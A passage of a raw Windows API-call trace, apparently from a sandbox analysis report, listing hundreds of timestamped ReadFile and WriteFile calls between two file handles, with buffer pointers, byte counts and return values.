lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xbf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.368] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x222, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.371] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.390] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x141, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.404] WriteFile (in: hFile=0x2b4, 